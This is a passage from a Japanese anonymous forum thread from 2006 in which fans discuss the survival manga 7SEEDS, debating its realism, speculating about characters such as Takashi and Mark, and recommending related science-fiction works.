それに政治家は思うほどお金持ってない。一回の選挙でいくら使うと思ってるの?
麻生家でもムリだよ。

>130
人によって気になる部分は違うもんじゃない?

133 :花と名無しさん:2006/10/31(火) 15:59:48 ID:???O
百舌戸が17年後の首相に決まってたってところから
政治方面は推して察せるじゃないか

134 :花と名無しさん:2006/10/31(火) 17:15:15 ID:???O
マスコミの首根っ子さえ押さえれば最後まですっとぼけられそうだけど…現実には難しいのかな。
資金面では中東辺りの石油産出国に冷凍技術を提供する見返りに、とかはどうだ。

135 :花と名無しさん:2006/10/31(火) 17:23:21 ID:???0
みんなすごいね。
あの世界は今自分が生きてるこの世界の延長線上ではないパラレル(アナザ?)ワールドだと
思って読んでるから細かい事を気にしたことないや。
てか、漫画やん。


136 :花と名無しさん:2006/10/31(火) 18:40:09 ID:???0
>>135同意
リアリティ求めてる人は
さいとうたかおのサバイバル読んどけ。

137 :花と名無しさん:2006/10/31(火) 18:40:37 ID:???O
そうだそうだ。
パニック物が大好きな自分には、細かい事はさほど気にならない。
パニック映画とかでもリアリティに突っ込み入れ始めるとキリないしね。
それよりはストーリーテリングというか、展開の転がし方やハッタリの上手さの方に惹かれる。
ただ、背景だけはもう少し力入れて描いてほしいなーとは思う。
今回だと、『大変な事になりました…』の辺りとか、ちょっと見辛かったので、手書きだったよかったな、と。

138 :花と名無しさん:2006/10/31(火) 18:43:44 ID:???0
自分も>>135と同じような考えだなー。
漫画なんだから細かいこと気にせず楽しまなきゃもったいない。

科学技術だって現代日本とは違うようだし
ひょっとしたら、政治機構だって似て否なる物かもしれないかも?
そこまでリアリティを求めるとなると、種計画からして成り立たないから
この漫画自体の意味までなくなってしまうような気がする・・・。

139 :花と名無しさん:2006/10/31(火) 18:48:30 ID:???0
リアリティ追求関連はいつも同じ人だと思う。

140 :花と名無しさん:2006/10/31(火) 18:53:12 ID:???0
私はこういった人類存続の危機ジャンルはリアリティがあればあるほど面白く楽しく感じる。
リアリティのある滅亡の危機→科学的根拠に基づく知恵と勇気で乗り越える、
そんなプロセスつか、シミュレーションのような、ね。
7種はすごく面白いよ、面白いけどその一方ぬるいなとも思う。

141 :花と名無しさん:2006/10/31(火) 18:54:31 ID:???0
>>139
確かに。しかも、しつこいよねw

142 :花と名無しさん:2006/10/31(火) 20:00:32 ID:???0
>>140
あなたのように楽しんで読めるひとには>>87>>89>>93のホテル
まじオヌヌメします



143 :花と名無しさん:2006/10/31(火) 20:35:23 ID:???0
>>142
さんくす、ホテルは読んだことはないけど
星野之宣、諸星大二郎、藤子F不二雄なんかは好きです。

144 :花と名無しさん:2006/10/31(火) 21:13:23 ID:???0
いつも一緒だった人形を手放してミイラになったマークの気持ちを思うと(;´Д`)

145 :花と名無しさん:2006/10/31(火) 21:53:55 ID:???0
藤子F不二雄のショートSFはスゴイですよね

146 :花と名無しさん:2006/10/31(火) 21:59:52 ID:???0
貴士って政府の仕事をしている事を花には秘密にしていたんだね。
いくら花でも父親の職業くらい知っているだろうし、
表向きは違う職業をしている事になっていたんだろうな。
自分の父親が政府側の人間である事を知った時、花はどう思うんだろう。

147 :花と名無しさん:2006/10/31(火) 22:32:44 ID:???O
貴士には、本人の諦観はともあれ無残な最期が待ってそうだな。安居と決着がついてないのが個人的に不満だったんだけど…。

148 :花と名無しさん:2006/10/31(火) 22:37:44 ID:???0
ネタバレ

実は秋ヲは貴士

149 :花と名無しさん:2006/10/31(火) 23:02:46 ID:???O
普通に考えれば美帆さんと一緒にとうに外で死を迎えてたはずじゃないの。
なのに別の計画のシェルターに入れるエンタメ要員をスカウトしてたのは。

150 :花と名無しさん:2006/10/31(火) 23:07:31 ID:???0
藤子F不二雄は大変な勉強家だからな
どらえもんの恐竜編1つ描くにも、世界史・古代史・紀元前など
調べ上げて現在発見されてる事実と矛盾ないように描く。
高校時代の教師どもがマンセーしてたな。

田村由美の作品が好きで7種も読んでるってのが基本だから
あんまりにも無視できないようなおかしな設定などが出てこない限り、
私は今の7種の世界観を受け入れて読むよ

151 :花と名無しさん:2006/10/31(火) 23:27:28 ID:???0
シェルターで暮らすに際して色々と対策は練ってるけど
鬱病等で精神に破綻を来たす者が続出するだろうね

二度と太陽と青い空を拝めないってのはかなりのストレスの筈
プレイベート空間もそれほど貰えそうに無い
獲れたてのマグロとか旬の鮭とかの美味しい魚を食べられないのは辛い
アルコール類がどれだけ醸造出来るかも影響するだろうなぁ

152 :花と名無しさん:2006/10/31(火) 23:33:11 ID:???0
貴士のあのやつれた顔から想像するに、
美帆さんは病死か自殺(花を手放した直後とか)
してるような気がするけど、どうだろう。

153 :花と名無しさん:2006/10/31(火) 23:59:22 ID:???O
単に老けただけじゃなく表情が死んでると思ったら、微笑が一つもなかったんだな。
なんかあったのかね。

154 :花と名無しさん:2006/11/01(水) 00:07:05 ID:???O
そういや花の回想の中に母さん出てきたこと一度もないな

155 :花と名無しさん:2006/11/01(水) 00:51:30 ID:???0
実は
花だけ未来へ送り出せないわー
ってんで自分も未来に行った。

156 :花と名無しさん:2006/11/01(水) 02:17:42 ID:???0
後の蘭である

157 :花と名無しさん:2006/11/01(水) 02:36:55 ID:???0
ワロスw

158 :花と名無しさん:2006/11/01(水) 10:51:08 ID:???0
藤子F不二雄はリアリティにはすごいこだわっても
自分の作品の設定にこだわってないよな。

ドラえもんに「恐竜狩りは犯罪。未来の世界じゃ法律で厳しく罰せられるんだ」
とか言わせといて、別の巻で
ドラ「恐竜狩りに行ってきたよ」
のび「恐竜狩り!?」
ドラ「未来の世界で今一番流行ってる、スリリングなゲームだよ」
とかなってる。

159 :花と名無しさん:2006/11/01(水) 12:49:45 ID:???0
>>158
きっと未来の法律が改正されたんだよ


160 :花と名無しさん:2006/11/01(水) 17:32:35 ID:???0
最近気力がなくて生きてる実感がわかない。
7種の世界に送って欲しい。


161 :花と名無しさん:2006/11/01(水) 20:23:25 ID:???0
>>160
そんなときは藤子F不二雄の作品を読むといいよ。
生きるための考えることがいっぱい出てくる。

162 :花と名無しさん:2006/11/01(水) 20:37:35 ID:???O
藤子F不二雄のスレはここでつか

163 :花と名無しさん:2006/11/01(水) 20:47:33 ID:???0
近視で虫歯ありで低身長で賢くなくて包茎な俺は絶対に送ってもらえない

164 :花と名無しさん:2006/11/01(水) 20:49:30 ID:???0
無理だね。

165 :花と名無しさん:2006/11/01(水) 21:09:48 ID:???O
あたしなら余裕でいけるんでね?

166 :花と名無しさん:2006/11/01(水) 22:03:07 ID:???0
小松左京の「復活の日」「日本沈没」なんか好きそうな人が結構いるね。
毛色は違うけどスティーヴン・キングの「ザ・スタンド」も好きかな?

7種はそういったテイストもあるけどアイデンティティは少女漫画にあるので
あまりごちゃごちゃ言うたらいかん。

167 :花と名無しさん:2006/11/01(水) 22:04:17 ID:???0
行きたいの?
私はとても無理だな、もし完璧な体持ってたとしても
精神的にヘタレだし

168 :花と名無しさん:2006/11/01(水) 22:12:44 ID:???0
7種の世界で1日生きられたら、自分にどんどん自信と気力に満ち溢れていけそうな予感

169 :花と名無しさん:2006/11/01(水) 22:15:11 ID:???0
>>166
復活の日は生き残ったメンバーが生殖機会を平等にするために
複数の相手とセックルをしないといけないので子供心におびえて泣いた

170 :花と名無しさん:2006/11/02(木) 00:24:18 ID:???0
戻って来れないのが問題。大問題。

171 :花と名無しさん:2006/11/02(木) 00:26:32 ID:???0
7SEEDSもそんな展開になったら大変えろい

172 :花と名無しさん:2006/11/02(木) 00:35:00 ID:???O
一応健全な少女マンガなんでそうはならないのが安心。
しかし全チーム出たし、もう後半なのかな。

173 :花と名無しさん:2006/11/02(木) 00:57:10 ID:???0
後半か…。
なんか寂しいな。
20巻くらいになるのかな。
その後、番外編(各ガイドたちの詳しい志願理由とか)をやるとしたら、もっと増えるかもしれないけど。

174 :花と名無しさん:2006/11/02(木) 01:45:14 ID:???0
番外編といえば、近所の古本屋で「バサラ全巻セット」ってシールが
1〜25巻セットに貼ってあったのを見たときはちょっと哀しかった

175 :花と名無しさん:2006/11/02(木) 08:10:16 ID:???0
戦国KIDSの続刊出ないのかなあ…あれ好きだったんだけど。

176 :花と名無しさん:2006/11/02(木) 12:14:16 ID:???0
もう後半に入ってるのか。
夏Aが出てくるまでは何か、面白くなりそうな予感はあるのにはじけれないって印象だったんだが。


177 :花と名無しさん:2006/11/02(木) 13:00:28 ID:???O
そろそろ謎だった過去も暴かれ尽くして、「この世界でどう生きるか」という展開になっていく頃だよね。
夏A編であれだけ濃く人間ドラマを描かれたおかげで、
(それまで普通に楽しく読んでただけだったのに)どっぷりハマった自分としては、
やっぱりこれからの極限の世界での愛憎交差する人間ドラマに期待してしまう。
正直、今ここでXデーの回想へ突入してしまうとは、ちょっと予想外だったな。
回想編はあとどれくらい続くのかな?
再来月には終わるかな。

178 :花と名無しさん:2006/11/02(木) 14:10:53 ID:???0
全チームが出揃ったのが起承転結の起だとしたら
完結はかなり先になりそうなので、
後半に入っててくれた方がありがたい。

179 :sage:2006/11/02(木) 15:43:22 ID:b1aTvtoW0
今月号の龍宮で思い出した。
シカゴの最終話に地下シェルターの話がでてきたような...
龍宮のストーリーはあの頃から考えてたネタなのかな〜
だとしたら楽しみ。この先どんな阿鼻叫喚が...

180 :花と名無しさん:2006/11/02(木) 15:44:29 ID:???0
sage間違えた、スマン。

181 :花と名無しさん:2006/11/02(木) 19:37:16 ID:???0
昨日、漫茶で読んでたけど夢見が悪かった。。方向性がわかんね、完結してから読むよ。

182 :花と名無しさん:2006/11/02(木) 20:30:55 ID:???0
恋愛なのかサバイバルなのか、でもSFだと設定が。
BASARAは連載の初期は作者の情熱が
空回りしてるとか言われてたらしいし。
これからかなー?

183 :花と名無しさん:2006/11/02(木) 23:01:52 ID:???O
落ち着き場所は何処なんでしょうね?
全チームみんなで仲良く協力して生きていこう!となるのがゴールなら、まだまだこれからな気が‥
そういうゴールでないならば、中盤にはなったのかな?と思う
しかし、そんなおいらは夏A7人ケテーイ時で既に燃え尽き症候群気味‥
マーク日記の回想録にドキがムネムネなんだが、これ終わったら本当に燃え尽きそうな悪寒
入り込み比率が半端じゃないマンガですね‥満喫で出会ってしまったのが運のツキ

184 :花と名無しさん:2006/11/03(金) 00:09:45 ID:???O
私は既に疲れてる(;´Д`)またバッドエンドまっしぐらな話?と。
希望のある話よりこういう緊迫感ある話の方がだれてないって人もいるんだろうが、張り詰めっぱ
なしなのはやだなあ。

185 :花と名無しさん:2006/11/03(金) 00:38:01 ID:???0
そこでタイムマシン発見

186 :花と名無しさん:2006/11/03(金) 01:08:39 ID:???0
あるあ・・・ね−よwww

187 :花と名無しさん:2006/11/03(金) 05:43:55 ID:???0
>>185
タイムマシン発見したところで、「これで身内と一緒に隕石で死ねるお」ってなエンディングになるだけなのだが。


7seedのシチュエーションはピトケアン島を思い出すねえ。

>そこで反乱の首謀者クリスチャン率いる9人は、タヒチ人の女12人と男6人、それから豚、
>ニワトリ、サツマイモ、タロイモなどをバウンティ号に積んで、やがて来るであろう追っ手の
>目につかない島を目指して出航。こうして1790年に辿りついたのが「絶海の孤島」である
>ピトケアン島だった。

>ピトケアン島に上陸した一行は、証拠隠滅のためバウンティ号に火をつけて沈め、自給自足
>のサバイバル生活に入ったが、やがて男同士の殺し合いが始まり、文字通りの「サバイバル」
>になってしまったのだ。女をめぐるトラブルをきっかけに奴隷のようにこき使われていたタヒチ
>人が何人かの水兵を殺し、残った水兵がタヒチ人を殺し、今度は水兵同士で殺し合いを始
>める・・・といった有り様で、島を逃げ出そうにもバウンティ号は沈めてしまったため、それも
>不可能。結局、18年後にアメリカの捕鯨船が訪れた時、島で生きていたのは女10人と子
>供23人、そして男はジョン・アダムスただ1人だけだった。


188 :花と名無しさん:2006/11/03(金) 05:47:34 ID:???0
おっと、引用元張るの忘れた。
ttp://www.geocities.co.jp/SilkRoad-Lake/2917/pacific/pitcairn.html

ちなみに彼らの子孫は1937年には233にまで増え、現在でも(転出した者も多いが)ピトケアン島に住んでいる。
ちょっと前に少女輪姦事件起こして大問題になったりしてるけど。

189 :花と名無しさん:2006/11/03(金) 09:30:33 ID:???0
最後まで嘘を突き通すというのは・・・
実はあの扉の奥は危険というより、何かを隠したいだけでは?

190 :花と名無しさん:2006/11/03(金) 11:40:55 ID:???0
>>182
へぇ、そんなこといわれてたんだ。

でもそういや私も、一巻だけ買ってワケワカンネwとか言ってた友人に借りて
その後古本屋でなんとなく立ち読みして、5巻を越えたあたりでようやく
続きがどうにも気になって買うことを決意したから、
確かに初めの頃はイマイチだったのかも

191 :花と名無しさん:2006/11/03(金) 15:17:51 ID:???0
>105
蝉ってボーカルっぽい絵が出てなかったっけ

192 :花と名無しさん:2006/11/03(金) 15:47:03 ID:???0
>>189
今月の回想を読むと、「嘘」の結末を隠したかったような感じがする。
しかし、そうすると、先々月号で、鷹の犬が呻っていた訳がわからん。
仮に共食いがあったとして、ミイラ化している状態では、見ただけでは判別できんのでは?

193 :花と名無しさん:2006/11/03(金) 15:47:43 ID:???0
龍宮を作った目的、流星群が落ちた後にもし人類が生き延びれたらその人たちが中心になる
七種計画、龍宮などの施設の人たちが生き延びられなかった時の保険

194 :花と名無しさん:2006/11/03(金) 16:11:59 ID:???0
>>144
人形手放したのはもう芸をして見せる人がいなくなったからでは?

195 :花と名無しさん:2006/11/03(金) 16:45:19 ID:???0
あの×印の扉の中には子供たちが大量凍死してると思われる
大人がパニックになって殺し合い、残った子供の行き先を悲観した
芸人さんがこの中に避難してれば助かるよと冷凍室へ
全員の死亡を確認した芸人さんは毒を飲んで扉の前で死亡

犬がうなってたのは先月号から今月号に扉の中に注目という漫画の「ヒキ」だよ

196 :花と名無しさん:2006/11/03(金) 18:08:11 ID:???0
ミイラになってるってんだから、たぶん空調が壊れて一時的に施設が高温・乾燥状態になったんじゃないかな。

197 :花と名無しさん:2006/11/03(金) 23:33:27 ID:???0
>>194
(⊃Д`)

198 :花と名無しさん:2006/11/03(金) 23:37:55 ID:???O
星野之宣の短篇では地下に疫病死体を大量に保存して「毒薬」にしてたってのがあるけど。
今月号の内容を見た感じでは皆の精神崩壊が全滅の原因なのかな。霊の話をしてたし。
だけど伝染病説もやはり捨てきれないわ。

199 :花と名無しさん:2006/11/03(金) 23:49:52 ID:???O
>194
マークにとってピートは、単なる「芸の道具」ではなく、
「自分の分身」「たった一人の家族」なんじゃないかな?
他人がいないとこでも、ピートと会話してたし。
例え、ただ一人生き残ったとしても、ピートと話し続けると思う。
だから、マークの遺体とピートが離れてるのは違和感がある。
日記は手にしてたのに。

200 :花と名無しさん:2006/11/03(金) 23:49:59 ID:???0
茨城マークさん、笑顔がかわいいね
男のキャラには見えないよ
最後のコマとか

できればこの人が七種計画で未来に来て欲しかったよ
楽しそうな性格だし

201 :花と名無しさん:2006/11/03(金) 23:51:31 ID:???0
うむ???
そういえば人形と腹話術するアニメがあったような・・・・

202 :花と名無しさん:2006/11/04(土) 00:10:24 ID:???0
伝染病説はどうかなあ…
ひとつのコミュニティが全滅するほどの伝染病が
隔離された文明国のシェルターでどうやって発生するというのか

203 :花と名無しさん:2006/11/04(土) 00:42:37 ID:???0
7SEEDSの虹サイトって幾つあるかね?バサラも数える程しか無いし

204 :花と名無しさん:2006/11/04(土) 01:01:00 ID:???0
>>202
やはり食料が無くなって精神的に追い詰められて殺し合いだろうね

205 :花と名無しさん:2006/11/04(土) 02:02:26 ID:???O
>>199
おいらもそう思った
てか、離れ離れなのには何か理由がある気がする>マークと人形ピート

206 :花と名無しさん:2006/11/04(土) 02:14:41 ID:???O
殺しあいや共食いまでいくかなあ。夏Aの最終テストも(特にその他大勢は)結局そこまではなら
なかったし。さじ加減を間違えたらB級以下の作品に落ちてしまう諸刃の剣という気がして嫌だ。

207 :花と名無しさん:2006/11/04(土) 11:16:54 ID:???O
11月号に出てきたピートがサンタの格好してるの見たら、
何らかの原因で竜宮の人達の生存絶望的→
マーク達の役割終わる→クリスマスに自殺か何かで親を亡くした子供にピートをねだられる→手放す

みたいな展開が浮かんだ。

208 :花と名無しさん:2006/11/04(土) 12:11:16 ID:???0
マークさん良いキャラだね
もう亡くなってるけど・・・
できればメインメンバーの方に入れて欲しかった

209 :花と名無しさん:2006/11/04(土) 19:27:04 ID:???0
【宇宙】小惑星「Apofiz-99942」、2029年に地球3万kmの距離に最接近・衝突の可能性も…ロシア(衝突予想画像?あり)★2
http://news19.2ch.net/test/read.cgi/newsplus/1162631168/

210 :花と名無しさん:2006/11/04(土) 23:39:06 ID:???O
>>203
そもそもこの漫画にパロができるほど想像の余地があるのだろうか。
少女マンガ要素を抜いてジャンプ辺りでやってたら、間違いなく同人屋が群がる内容だとは思うけ
どな。花と嵐には想像の入る隙がないし、ナツの相手もいつか決定するだろうし。

211 :花と名無しさん:2006/11/04(土) 23:43:51 ID:???0
マークさん死ぬ前にいい思いさせてやってよ・・・お願いだから
いい笑顔してるよ。

212 :花と名無しさん:2006/11/05(日) 00:35:32 ID:???0
ミキ・マリとのラブ展開なら可能性はある

213 :花と名無しさん:2006/11/05(日) 01:33:31 ID:???O
しかし最期は…・゚・(ノД`)・゚・成就してるカプが不信感がある脇役の流星・くるみしかいない淋しい状況。

214 :花と名無しさん:2006/11/05(日) 02:53:48 ID:???O
人口減っていくにつれ
役割なくなった順番に死んでいくような展開になりそ。
役割遂行中に殺されたりとか、自滅シェルターってのは前提なんだろうね
しかし後味悪くて楽しんで読んでいいのか気になる

215 :花と名無しさん:2006/11/05(日) 03:54:40 ID:???0
かなり昔の少女漫画で
滅亡に瀕した都市で管理者に生きる希望を歌うことを指示されていた歌姫が
自分の歌いたいものはこれじゃない、と甘く厭世的な死に誘われる歌を歌い
多くの自殺者を出したために歌えなくされた
…ってエピソードがあったのをふと思い出した。
まあミキ・マリじゃそういう展開にはなりそうもないけど。

216 :花と名無しさん:2006/11/05(日) 04:42:09 ID:???0
>>215
山田ミネコ?

217 :花と名無しさん:2006/11/05(日) 11:02:55 ID:???0
最終戦争シリーズか

強くて生きる意欲に満ちているように見えても
美鶴さんみたいになっちゃう人もいるからね
ミキ・マリでもありうるかも?

218 :花と名無しさん:2006/11/05(日) 12:55:03 ID:???0
神酒マリア、明け方の地震で起きたときにはジャージ穿いてたのに
いつのまに脱いだのかな?

219 :花と名無しさん:2006/11/05(日) 14:09:22 ID:???O
過去編はいつも男性視点なんだなあ。女性だとナツ花が霞むからかな?


220 :花と名無しさん:2006/11/05(日) 18:21:42 ID:3OH8fG+S0
SF脳で読んじゃダメなまんがですね
FT脳に切り替えなきゃ・・・

221 :花と名無しさん:2006/11/05(日) 18:34:43 ID:???O
田村マンガの魅力をそっくり持ちつつ科学考証が完璧な作品があれば教えてください。

222 :花と名無しさん:2006/11/05(日) 18:47:38 ID:???0
地球最期の日
http://www.youtube.com/watch?v=jDUv5BbAdTg

223 :花と名無しさん:2006/11/05(日) 19:33:47 ID:???0
この回想編で貴士の最後が描かれる可能性が高そうだけど、だとしたら、
どんな風になるんだろ。
これまでたむさんの漫画で、強い信念を持つ美形悪役って、あまり精神的に
惨めな最期をとげないんだよな。大抵、カッコつけて満足して死ぬ。
貴士の場合、あれほどの事をした以上、デスノのライト君みたく、
精神的に思いっ切り絶望して、未練タラタラでくたばってほしいものです。
まあ、たとえそうなっても、最後は「いやだぁ、死にたくないいいい!!!」
みたいなセリフじゃなくて、スカした捨てセリフ吐いて死にそうだけど。

224 :花と名無しさん:2006/11/05(日) 19:48:45 ID:???O
読者の溜飲は思いっきし下がるねw
花はショック受けるかもだけど、
後で夏Aと会うこと考えたら、
幻滅しとくくらいの方がよさそう。

225 :花と名無しさん:2006/11/05(日) 19:52:28 ID:pTAAzLHGO
てすと

226 :花と名無しさん:2006/11/05(日) 20:32:55 ID:???0
ちょっと前の少年誌だと、貴士みたいなことをしたやつは
「うひいいいいいい!た、助しゅけてえ!ぐぼあっ!」とか言いながら
串刺しになってくたばり、
「貴様にはそんな死がふさわしい…地獄で俺の仲間に詫びるがいい」
なんて言われたものだがw
少女マンガ+クールな美形悪役ってだけで、彼が悲惨な最期を遂げることを
免罪されてほしくないものです。

227 :花と名無しさん:2006/11/05(日) 20:34:56 ID:???0
>>222
地球大進化だね

228 :花と名無しさん:2006/11/05(日) 20:37:54 ID:???0
そうじゃなきゃ、同じことをしたのに、いかにも小者っぽく死んだ卯浪が
むくわれねえw

229 :花と名無しさん:2006/11/05(日) 21:35:45 ID:???0
>>228
やった事は確かに同じ。
ただ、卯浪は事態を甘く見ていた、つまり貴士より頭が悪かった。
あんな仕打ちをした子供達が他の大人が1人もいない未来で自分の
命令に従うなんて甘い事、貴士は考えもしなかったと思う。
だからある程度自業自得な最後だと思う。

230 :花と名無しさん:2006/11/05(日) 21:49:06 ID:???0
要は卯波がついていくの反対したらしいから結末に想像が付いていたんだろう
貴士さんも同じ事考えてたんじゃないか

しかし、「突然覚えのない招待状が届いて驚いた事でしょう」って書いてあったけど
「おめでとうございます!あなたが当選しました」系のあやしげな招待状が届いたんだろうか
よくそんなんで5000人も集まったなあとかちょっと思っちゃった

231 :花と名無しさん:2006/11/05(日) 21:55:39 ID:???0
貴士は綺麗に死んでいくんじゃないかなぁ。なんとなく
パニクって暴徒になった連中をモニターで眺めながら
「まあ一般人はこんなものか。もともと無茶な計画だったからな」とか思いながら、
最後は未来へ行った花や百舌の身を案じながら拳銃自殺とかするんじゃないの
死体は汚くなるが、散り様はひどくない。そんな感じ

232 :花と名無しさん:2006/11/05(日) 22:26:17 ID:???O
>>229
>貴士は考えもしなかった
卯浪は…の間違いだよね?
貴士は気が進まなかったと言ってたし。
まあ、貴士も要も同罪だけど、卯浪はあの中で明らかに
考え浅いというか勘違いしてる人物だった感じ。

233 :花と名無しさん:2006/11/05(日) 22:26:21 ID:???0
>>230
なんでこんな詐欺に騙されるんだろって詐欺に騙される人が大勢いるし
(オレオレ詐欺や懸賞詐欺、当選詐欺等)
5000人集まっても不思議じゃないと思う

234 :花と名無しさん:2006/11/05(日) 22:34:32 ID:???0
【無料ご招待】に惹かれてくるヤツはどんな時代にも必ずいる

235 :花と名無しさん:2006/11/05(日) 22:40:48 ID:???0
>>231
えええええ、卯浪以上に惨たらしく死んで欲しい。
姑息な所が卯浪より腹が立つ。

236 :花と名無しさん:2006/11/05(日) 22:51:21 ID:???O
貴士の最後の望みは美帆と一緒に死を迎えることだから、それが叶えられないことが一番の報い、
と言うところへ持っていかないかなあ。ちゃんと彼女もいるのか気になる。

237 :花と名無しさん:2006/11/05(日) 23:05:44 ID:???0
卯浪のセクハラを止められる立場だったかもしれないのに
見てみぬフリしてたんだよね。
セクハラが必要なら自分でやればよかったのに。
要って殺されるかもしれないことを覚悟していて
夏Aを心配している、優しくて悲しい人になるのか。


238 :花と名無しさん:2006/11/05(日) 23:18:01 ID:???O
貴士の最期が読者にわかるように描かれても
マークがそれを知っててしっかり書いてくれなきゃ
花たちには届かないんだよね
結構複雑だ

239 :花と名無しさん:2006/11/05(日) 23:32:45 ID:???O
花はいつ気付くんだろうな。この章でか、夏Aとの衝突でか。わからない方がまだ幸せかも。

240 :花と名無しさん:2006/11/06(月) 03:04:05 ID:???O
この章でわからなかったら、要が話さない限り
花が知ることはなさそう。
夏Aメンバーが貴士のこと話したとしても、花が
自分の父親だと確信するようなプライベートな事柄は
メンバーも知らないだろうし……
あ、涼と虹子は名字を知ってるか。

241 :花と名無しさん:2006/11/06(月) 04:23:08 ID:???0
>>229
まーそうなんだけどさ、とにかく彼(うなみ)には、行為にふさわしい
鉄槌が下ったわけで。
>>235さんの言うとおり、姑息というか、自分は頭が良く全てをコントロールでき、
シェルターの結末も見通してるってようなツラが気に食わねえw。
どうせ今やってることも、娘のために5000人を生存シミュレート実験に使おうとか、
そんな腹である可能性が高いし、だとしたら卯波の100倍タチが悪い。
こういう奴の最後は、キザな遺言を残して拳銃自殺なんてなまぬるい。
まだ死ぬ予定でない段階で強制的に殺される、日本国王や柳のような最後をきぼん

242 :花と名無しさん:2006/11/06(月) 11:25:04 ID:???0
要が文字通りこの物語の要

243 :花と名無しさん:2006/11/06(月) 11:38:07 ID:???O
とにかく陰欝な今の章はさっさと終わらせて夏Bの行方(牡丹側もだが)を教えてくれ〜。
嵐の心配事がなくなったナツが次に何考えてるか、気になってしょうがない。

244 :花と名無しさん:2006/11/06(月) 14:28:15 ID:???0
「他の誰が死んだって その人だけ生きててほしい人がいるでしょう」
貴士と花って、根本的に似ているんだな。

245 :花と名無しさん:2006/11/06(月) 15:09:15 ID:???O
よく言えば一途、悪く言えば偽善的だった所が似てる。花はまだ若いし、色んな人に会って優しく
されたり死ぬかと思うような色んな経験をしてる最中だから、そこがどう父と違う風になっていく
のか見守りたい…かな。(とはいえナツの方が気になるんだけどな(;´Д`)
しかし貴士は自己完結してさっさと自害しそうだね。

246 :花と名無しさん:2006/11/06(月) 16:30:48 ID:???O
>>245
花のそういう所って良くない、と言うか変わっていくべき所なのかな?
貴士の様に他人に危害を加えるならともかく、
自分と自分の大切な人以外はどうでもいいやって考え方は、誰もが多かれ少なかれ持ってるエゴだと思うんだけど…。
むしろ、自分に関係のない人たちの事も関係ある人たちと同じようにって方が嘘寒いというか、
無理してる感じ、そうあろうと努力してる感じがするよ。

247 :花と名無しさん:2006/11/06(月) 16:46:30 ID:???O
花の性格批判をするつもりはないんだけどな。普段正義感の固まりのようなのに、切羽詰まったと
きの本音とのずれが個人的に気持ち悪かったんでね。第一花自身がそういう時他人のことまで考え
られなくなるって自覚してたでしょ。誰でもそうかとは関係なく。

248 :花と名無しさん:2006/11/06(月) 16:56:45 ID:???O
補足すると6巻の「あたしたちもそうなれるかな」ってとこ。嵐もこういう時他のことは目に入ら
なくなるタイプだってわかってるみたいだった。嵐が鷹を拒絶した経緯を知っても花は納得したん
じゃないかね。

249 :花と名無しさん:2006/11/06(月) 16:58:24 ID:???0
セックスシーンがないのは片手落ちだ

250 :花と名無しさん:2006/11/06(月) 20:43:02 ID:???O
花と嵐にあるじゃねーか。
回想だけど。

251 :花と名無しさん:2006/11/06(月) 21:06:30 ID:???O
お蘭と秋ヲがやってたじゃねーか。

252 :花と名無しさん:2006/11/06(月) 21:33:48 ID:???0
>>251
あれは寸止めでは?

253 :花と名無しさん:2006/11/06(月) 22:01:06 ID:???0
>>250
チェックしたところ3つそれらしき場面があった

254 :花と名無しさん:2006/11/07(火) 00:59:29 ID:???0
僕の鷹きゅんは童貞でしょうか?
その辺のアホ女に引っ掛かってないかとても心配です

255 :花と名無しさん:2006/11/07(火) 01:21:39 ID:???0
>>239
この章で知ると、花は夏Aのことを知らないんだから、父は冷静に人類を残そうと
最後まで立派に戦って(努力して)死んだと思うかも。
ただその思いが、夏Aとのさらなる対立の元凶になるかも。
「お前の父親は悪魔だ」「違う、お父さんは人類を残すために…」そんな感じで。

256 :花と名無しさん:2006/11/07(火) 01:35:08 ID:???0
>>246
全く同意。
さらに加えれば、花が「他の誰が・・・」ってセリフを言ったのは、ハルに言った「あなたにも大切な人がいるでしょう」のセリフの
「大切な人」の例えとして(それくらい大切という意味で)言ったわけだから、エゴと言うほどのモンでもないと思う。
さすがにあのシーンでの花のセリフに貴士の行動を重ねるのは、かなり色眼鏡が入ってると思う。

257 :花と名無しさん:2006/11/07(火) 01:43:48 ID:???O
あぁ、確かに普段ああまで正義感が強いタイプだと、あのギャップは何か引っかかるよね。
うまく言えないけど、あなたの言いたかったことは分かった気がする。

258 :花と名無しさん:2006/11/07(火) 07:22:58 ID:AefW5nwL0
花も嵐も 踏み越えて
行くが男の 生きる途
泣いてくれるな ほろほろ鳥よ
月の比叡を 独り行く

優しかの君 ただ独り
発たせまつりし 旅の空
可愛い子供は 女の生命
なぜに淋しい 子守唄

259 :花と名無しさん:2006/11/07(火) 09:43:40 ID:???O
今読み返すと、花と貴士は舌禍タイプな親子やな、と思ってしまう。
花は物事をはっきり言い過ぎるんだろな、と。
実際に誰かが死にそうになってれば、絶対助けるんだろうしさ。
貴士の方は、安居と涼への台詞が、言わんでもいいことをわざわざ空気嫁て感じ。
花が夏Aに憎まれるなら、半分くらいは貴士の蒔いた種じゃないだろうか。残り半分は要。

260 :花と名無しさん:2006/11/07(火) 11:50:44 ID:???O
貴士の厚顔ぶりやナツのうじうじは読者に批判されるのも計算でやってる気がするけど、花の人物
造形はナツと対照的にしようとして(脆さも含め)あれもこれもいいとこどりしようとして滑ってる
気がするな〜。

261 :花と名無しさん:2006/11/07(火) 14:38:20 ID:???0
花の人物造形がナツと対照的にしようとして
滑っているのだとすれば、作者の頭の中では
今でもナツが本来のヒロインという事なのだろうか。

262 :花と名無しさん:2006/11/07(火) 14:55:46 ID:???O
キャラ的には相当どうでもいい人だけどね>ナツ
これだけの人数が出揃った今となっては、ナツもその周辺の人も
キャラが薄くて存在をしばしば忘れてしまう

263 :花と名無しさん:2006/11/07(火) 15:20:46 ID:???O
ナツはともかく、夏Bは重要な存在でわ?
わざわざ1チーム増やしたんだしさ。

264 :花と名無しさん:2006/11/07(火) 16:28:08 ID:???0
ナツは「普通」にしようとしすぎて、キャラが立たなくなっちゃった。やっぱりこういうタイプを
ヒロインにするのは慣れてないんだろうな。
ぞうとらいおん丸の行方は気になるけど、ナツ自体は確かにほとんど気にならない。

265 :花と名無しさん:2006/11/07(火) 16:45:51 ID:???O
いいや、まだそう決めてしまうのは時期尚早だと思う…けど今のままじゃ選ばれるべくして選ばれ
た者達だけの話になってつまらないな。落ちこぼれチームでピックアップされてるのはナツだけな
んだから、ぜひキャラ立ちしてほしいんだけど、この放置ぶりには一抹の不安を感じる(;´Д`)。

266 :花と名無しさん:2006/11/07(火) 16:46:27 ID:???0
秋のチームはどうなったんですか?

267 :花と名無しさん:2006/11/07(火) 17:19:30 ID:???O
いずれ活躍するポジションなはずなのはわかるけど、
9巻まで来た現在、ナツは立ち位置的にも人物的にも
